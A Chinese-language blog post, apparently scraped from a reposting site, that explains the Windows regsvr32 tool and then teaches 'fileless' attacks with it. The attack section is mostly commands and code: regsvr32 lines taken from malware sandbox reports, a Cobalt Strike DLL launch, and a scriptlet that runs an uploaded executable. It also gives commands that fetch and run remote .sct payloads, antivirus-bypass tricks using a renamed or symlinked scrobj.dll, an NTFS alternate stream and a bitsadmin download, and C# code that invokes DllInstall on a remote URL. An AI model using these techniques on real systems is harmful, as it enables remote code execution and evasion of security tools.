2. 程式人生 > 其它 >Regsvr32 使用和無檔案攻擊的一些示例

Regsvr32 使用和無檔案攻擊的一些示例

阿新 發佈:2022-03-20

Regsvr32使用方法
 
      使用過activex的人都知道,activex不註冊是不能夠被系統識別和使用的,一般安裝程式都會自動地把它所使用的activex控制元件註冊,但如果你拿到的一個控制元件需要手動註冊怎麼辦呢?如果修改登錄檔那就太麻煩了,在windows的system資料夾下有一個regsvr32.exe的程式,它就是windows自帶的activex註冊和反註冊工具。它的用法為:

  “regsvr32 [/s] [/n] [/i(:cmdline)] dllname”。其中dllname為activex控制元件檔名,建議在安裝前拷貝到system資料夾下。

  引數有如下意義:

  /u——反註冊控制元件

  /s——不管註冊成功與否,均不顯示提示框

  /c——控制檯輸出

  /i——跳過控制元件的選項進行安裝(與註冊不同)

  /n——不註冊控制元件,此選項必須與/i選項一起使用 

  利用Regsvr32進行無檔案攻擊的一些示例:   https://any.run/report/8fb2c48223952ffa157c8a0b9ab98e9f8b2924f7b8aa1faef94f3adc91eb8b61/e8ca24ff-3766-43fd-a7e6-9ac7254791a7 payload:
C:\Windows\system32\regsvr32.exe /s "C:\Users\admin\AppData\Local\Anzipaj\tnqss.vtj"
    https://any.run/report/cd733ef7cf3631039694f5b72f980753cad96f1eda6c48e2fcfe63edb4c7d869/be4f34c2-7595-4284-bfca-e85c1a177419 payload:
C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll
    https://any.run/report/6adf75ae4502208cb1d295a95bc3f7263b14a2568c0108554e7ea30cec2fa1c2/f1d9aabb-45b6-4221-8a50-e060633f23c9 payload:
C:\Windows\system32\regsvr32.exe /s "C:\Users\admin\AppData\Local\Lluanj\eroykvous.yas"
  https://any.run/report/92bcccff665698781f065436366b7029220c8068e2524553d99ff7dde2b03597/6e9e1e95-d79e-4831-8b04-61e9186ee6b0 

payload:

C:\Windows\system32\regsvr32.exe /s "C:\Users\admin\AppData\Local\Strvtedpo\jiiuekutsoez.koi"

regsvr32 使用說明

0x00 regsvr32 簡介

在windows的system資料夾下有一個regsvr32.exe的程式,它就是windows自帶的activex註冊和反註冊工具。(activex不註冊是不能夠被系統識別和使用的,一般安裝程式都會自動地把它所使用的activex控制元件註冊)。Regsvr32命令用於註冊COM元件,是 Windows 系統提供的用來向系統註冊控制元件或者解除安裝控制元件的命令,以命令列方式執行

0x01 regsvr32存放路徑

WinXP及以上系統的regsvr32.exe在windows\system32資料夾下;
2000系統的regsvr32.exe在winnt\system32資料夾。

0x02 regsvr32 用法

  
"regsvr32 [/s] [/n] [/i(:cmdline)] dllname”。
其中dllname為activex控制元件檔名,建議在安裝前拷貝到system資料夾下。
引數有如下意義:
/u——反註冊控制元件(解除安裝com組建)
/s——不管註冊成功與否,均不顯示提示框(靜默模式,不彈框)
/c——控制檯輸出
/i——跳過控制元件的選項進行安裝(傳給DllInstall的引數內容,regsvr32 允許註冊過程中 dll 進行一些自定義的安裝過程,該過程在 DllInstall 中實現。)
/n——不註冊控制元件,此選項必須與/i選項一起使用
Scrobj.dll:com伺服器,全名Windows Script Component,DllInstall方法在這個元件中實現。

eg

  
regsvr32 /s /n /u /i:http://127.0.0.1/file.sct scrobj.dll
sct檔案的呼叫在scrobj.dll中的install過程,可以理解為regsvr32 只不過是負責呼叫 dll 的一個工具,可能還會有寫入登錄檔的功能。

0x03 regsvr32 命令執行案例

Regsvr32.exe直接呼叫dll程式

1、Cobalstrike 生成dll檔案

2、Regsvr32.exe直接呼叫dll程式
c:\Windows\System32\regsvr32.exe artifact.dll

3、cs成功上線

通過 sct 遠端執行繞過防病毒

這裡前提需要將 exe 檔案上傳到目標主機 本文上傳到c:\test.exe
payload.sct檔案內容如下:

  
<?XML version="1.0"?>
<scriptlet>
<registration         
progid="Pentest"       
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
 
<![CDATA[   
var r = new ActiveXObject("WScript.Shell").Run("cmd /k c:\\test.exe"); 
]]>
 
</script>
</registration>
</scriptlet>

上面程式碼可以上傳到Github等白名單域名 本文使用Cobalt Strike自帶的服務來搭建 順便介紹功能

開啟>Web Drive-by>Host File

  
regsvr32 /u /n /s /i:http://192.168.130.130:80/payload.sct scrobj.dll

呼叫scrobj.dll 繞過方法

  • 改變 scrobj.dll 的名稱
  
copy c:\windows\system32\scrobj.dll NothingToSeeHere.dll
Regsvr32.exe /u /s /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct NothingToSeeHere.dll
  • 為 scrobj.dll 建立符號連結
  
Mklink Dave_LovesThis.dll c:\windows\system32\scrobj.dll
Regsvr32.exe /u /s /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Dave_LovesThis.dll
  • 利用 NTFS ADS 功能繞過
  
type c:\Windows\System32\scrobj.dll > Just_A_Normal_TextFile.txt:PlacingTheDLLHere
Regsvr32.exe /u /s /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Just_A_Normal_TextFile.txt:PlacingTheDLLHere
  • 先將 sct 檔案放到本地,然後執行
  
bitsadmin /transfer download /download /priority normal https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct %TEMP%\test.txt && regsvr32.exe /s /u /i:%TEMP%\test.txt scrobj.dll
Regsvr32.exe /u /s /i:Regsvr32_calc.sct scrobj.dll
  • 直接呼叫scrobj.dll的DllInstall方法

其實可以不用regsvr32.exe,使用他的目的是因為他是 windows 自帶的,有微軟簽名,如果不考慮這個的情況下其實可以寫程式直接呼叫 scrobj.dll 的 DllInstall 方法實現程式碼執行。C#程式碼如下:

  
using System;
using System.Reflection;
using System.Runtime.InteropServices;
using System.ComponentModel;

namespace scrobj_call_csharp
{
    static class NativeMethod
    {
        [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
        public static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);

        [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    }

    class Program
    {
        [UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Unicode)]
        private delegate Int32 DllInstall(Boolean bInstall, String pszCmdLine);

        static void Main(string[] args)
        {
            const string dllPath = "scrobj.dll";
            IntPtr hDllScr = NativeMethod.LoadLibrary(dllPath);
            if (hDllScr == IntPtr.Zero)
            {
                var lasterror = Marshal.GetLastWin32Error();
                var innerEx = new Win32Exception(lasterror);
                innerEx.Data.Add("LastWin32Error", lasterror);

                throw new Exception("Can't load Dll " + dllPath, innerEx);
            }

            IntPtr DllInstallProcAddr = NativeMethod.GetProcAddress(hDllScr, "DllInstall");
            DllInstall fDllInstall = (DllInstall)Marshal.GetDelegateForFunctionPointer(DllInstallProcAddr, typeof(DllInstall));

            fDllInstall(false, "http://192.168.50.129:80/payload.sct");
        }
    }
}

成功呼叫scrobj.dll的DllInstall 方法實現程式碼執行。


__EOF__


相關推薦

Regsvr32 使用檔案攻擊一些示例

Regsvr32使用方法         使用過activex的人都知道,activex不註冊是不能夠被系統識別使用的,一般安裝程式都會自動地把它所使用的activex控制元件註冊,但如果你拿到的一個控制元件需要手動註冊怎麼辦呢?

使用 WScript.exe 執行指令碼檔案攻擊的案例

使用 WScript.exe 執行指令碼 WScript.exe 是 Windows 指令碼宿主的一個版本,用來在 Windows 中執行指令碼。WScript.exe 提供了基於 Windows 的對話方塊,用於設定指令碼屬性。 使用 WScript.exe,可以通過下列方式

java使用poi讀取docdocx檔案的實現示例

這幾天在學習java io流的東西,有一個網友看到部落格後問了一個問題,就是說他的doc文件為什麼用我所說的方法死活就是亂碼。

Linux 檔案攻擊memfd_create()具體操作步驟

攻擊: 1、新建檔案elfload.pl.head 內容: #!/usr/bin/env perl use warnings; use strict; $|=1; my $name = \"\";

CScript 可以用來做檔案攻擊

cscript 專案 2022/03/08 10 個參與者   適用範圍:Windows Server 2022、Windows Server 2019、Windows Server 2016、Windows Server 2012 R2、Windows Server 2012

WmiPrvSE 檔案攻擊——基本上都是借同一個程序名字來迷惑使用者

Wmiprvse.exe程序詳細引數   Wmiprvse.exe是Windows管理規範(WMI),它是微軟 Windows 作業系統的一個元件,它能夠實現為使用者提供管理資訊企業環境中的控制功能。管理者可以用WMI查詢設定關於系統桌面、應用程

netsh 檔案攻擊

netsh濫用例子: https://any.run/report/f77d0ef3d5aa74b233cb642fa5b6dab1c57c9cde503e1a3dd085dba621fbb45c/aa925b1d-19c8-497f-b328-3364e85297b4

powershell_ise 檔案攻擊

Windows PowerShell ISE 是什麼  最近因為專案的需要,開始接觸到了 Windows PowerShell ISE 這個軟體。

Window許可權維持(四):快捷方式——poshc2、empire這些通過lnk的檔案攻擊值得注意

Window許可權維持(四):快捷方式 系統安全Bypass007 2019-12-04 8,935   Windows快捷方式包含對系統上安裝的軟體或檔案位置(網路或本地)的引用。自從惡意軟體出現之初,便已將快捷方式用作執行惡意程式碼以

檔案攻擊——巨集病毒製作

1. 惡意檔案形式:基於巨集 (1)落地形式 非PE的間接檔案:A、基於巨集(型別III:Offic文件、PDF文件)

使用webpack打包js檔案css檔案簡單示例

技術標籤:微服務線上教育平臺 在工作區建立一個資料夾 webpackdemo (vscode建立工作區) 初始化資料夾 右鍵資料夾在終端開啟 輸入

檔案資料夾的一些操作

檔案資料夾的一些操作 檔案是否存在 bool PathExists(const std::string &path) { struct stat info;

java檔案下載程式碼例項(單檔案下載檔案打包下載)

這篇文章主要介紹了java檔案下載程式碼例項(單檔案下載檔案打包下載),文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

springboot實現單檔案檔案上傳

本文例項為大家分享了springboot實現單檔案/多檔案上傳的具體程式碼,供大家參考,具體內容如下

Maven打包jar生成javadoc檔案source檔案程式碼例項

這篇文章主要介紹了Maven打包jar生成javadoc檔案source檔案程式碼例項,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

Mysql悲觀鎖樂觀鎖的使用示例

悲觀鎖 悲觀鎖,認為資料是悲觀的。當我們查詢資料的時候加上鎖。防止其他執行緒篡改,直到對方拿到鎖,才能修改。

Redis實現分散式鎖等待序列的方法示例

在叢集下,經常會因為同時處理髮生資源爭搶併發問題,但是我們都知道同步鎖synchronized 、cas 、ReentrankLock 這些鎖的作用範圍都是JVM ,說白了在叢集下沒啥用。這時我們就需要能在多臺JVM 之間決定執行順序的

RR與RC隔離級別下索引鎖的測試指令碼示例程式碼

基本概念 當前讀與快照讀 在MVCC中,讀操作可以分成兩類:快照讀 (snapshot read)與當前讀 (current read)。 快照讀,讀取的是記錄的可見版本 (有可能是歷史版本),不用加鎖。當前讀,讀取的是記錄的最新版本,並且

Ubuntu中MySQL的引數檔案my.cnf示例詳析

前言 對於MySQL的理解,我認為很多效能優化工作、主從主主複製都是在調整引數,來適應不同時期不同數量級的資料。

Matplotlib繪製雷達圖三維圖的示例程式碼

1.雷達圖 程式示例 \'\'\'1.空白極座標圖\'\'\' import matplotlib.pyplot as plt plt.polar() plt.show()